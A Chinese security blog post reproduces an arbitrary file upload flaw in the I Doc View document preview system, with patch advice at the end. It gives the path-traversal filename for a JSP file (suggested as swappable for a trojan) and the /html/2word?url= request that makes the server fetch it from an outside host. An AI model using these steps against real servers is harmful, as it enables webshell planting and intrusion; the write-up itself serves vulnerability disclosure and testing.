I Doc View任意文件上传漏洞复现 2024-02-22 10:11:49 ![](https://image.3001.net/images/20240308/1709876354_65eaa4828e91d155430d9.png) 本文由 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载 0x01 影响系统 ========= I Doc View在线文档预览系统 **受影响版本** I Doc View < 13.10.1\_20231115 0x02 漏洞复现 ========= 1.本地服务器上新建一个html文件,文件内容如下: test 2.本地服务器上新建一个..\\..\\..\\docview\\testpoc.jsp(可以换成木马什么的),内容如下: test 3.上面这个文件可以这么来创建 ![](https://image.3001.net/images/20240222/1708566811_65d6a91b579fe8383fb28.png) ![](https://image.3001.net/images/20200701/1593550745.png) 4.创建好的文件如下:![](https://image.3001.net/images/20240222/1708566856_65d6a948dab6a3ee24608.png) 5.之后可以在上面目录下用python启动一个http服务,接着直接访问漏洞地址[http://目标地址/html/2word?url=http://本地服务器地址/tt.html](http://10.0.100.3/html/2word?url=http://8.130.129.3/tt.html)触发该漏洞。![](https://image.3001.net/images/20240222/1708566890_65d6a96adfc423d003e08.png) 6.漏洞触发后,会在网站根目录下创建恶意jsp文件,如下图:![](https://image.3001.net/images/20240222/1708566940_65d6a99cb44376439afa6.png) 0x03 修复建议 ========= 目前I Doc View官方已发布新版本修复该漏洞,建议受影响的用户尽快至官网下载更新或联系技术支持获取安全补丁修复漏洞。 官方链接:[https://www.idocv.com/about.html](https://link.zhihu.com/?target=https%3A//www.idocv.com/about.html) \# 漏洞 \# 渗透测试 \# web安全 \# 漏洞分析 \# 网络安全技术